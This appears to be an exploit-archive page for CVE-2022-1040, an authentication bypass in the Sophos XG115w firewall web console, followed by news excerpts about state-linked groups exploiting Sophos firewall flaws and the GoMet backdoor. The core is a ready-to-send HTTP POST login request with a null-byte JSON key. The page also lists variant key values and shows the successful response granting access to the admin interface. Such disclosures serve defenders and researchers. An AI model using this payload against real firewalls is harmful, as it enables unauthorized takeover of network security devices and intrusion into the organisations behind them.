Headline
Sophos XG115w Firewall 17.0.10 MR-10 Authentication Bypass
Sophos XG115w Firewall version 17.0.10 MR-10 suffers from an authentication bypass vulnerability.
# Exploit Title: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass# Date: 2022-08-09# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.sophos.com# Version: 17.0.10 MR-10# Tested on: Windows 11# CVE : CVE-2022-1040# [ VULNERABILITY DETAILS ] : #This vulnerability allows an attacker to gain unauthorized access to the firewall management space by bypassing authentication.# [ SAMPLE REQUEST ] :POST /webconsole/Controller HTTP/1.1Host: 127.0.0.1:4444Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: text/plain, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestOrigin: https://127.0.0.1:4444Referer: https://127.0.0.1:4444/webconsole/webpages/login.jspSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 192mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066# [ KEY MODE ] : \u0000eb ,\u0000fc , \u0000 ,\u0000ef ,...# [ Successful response ] :HTTP/1.1 200 OKDate: Thu, 04 Aug 2022 17:06:39 GMTServer: xxxxX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000Expires: Thu, 01 Jan 1970 00:00:00 GMTContent-Type: text/plain;charset=utf-8Content-Length: 53Set-Cookie: JSESSIONID=1jy5ygk6w0mfu1mxbv6n30ptal108;Path=/webconsole;Secure;HttpOnlyConnection: close{"redirectionURL":"/webpages/index.jsp","status":200}
Related news
Nearly 20% of the zero-day flaws that attackers exploited in 2022 were in network, security, and IT management products, Mandiant says.
As many as 55 zero-day vulnerabilities were exploited in the wild in 2022, with most of the flaws discovered in software from Microsoft, Google, and Apple. While this figure represents a decrease from the year before, when a staggering 81 zero-days were weaponized, it still represents a significant uptick in recent years of threat actors leveraging unknown security flaws to their advantage. The
A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities. Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan
Security software company Sophos has warned of cyberattacks targeting a recently addressed critical vulnerability in its firewall product. The issue, tracked as CVE-2022-3236 (CVSS score: 9.8), impacts Sophos Firewall v19.0 MR1 (19.0.1) and older and concerns a code injection vulnerability in the User Portal and Webadmin components that could result in remote code execution. The company said it
A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found. The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network. "This access could be
Executive summary Since the Russian invasion of Ukraine began, Ukrainians have been under a nearly constant barrage of cyber attacks. Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine — this time aimed at a large software development company whose software is used in various state organizations within Ukraine. We believe that this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named "GoMet." The malware was first observed on March 28, 2022. GoMet backdoor The story of this backdoor is rather curious — ther...
A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks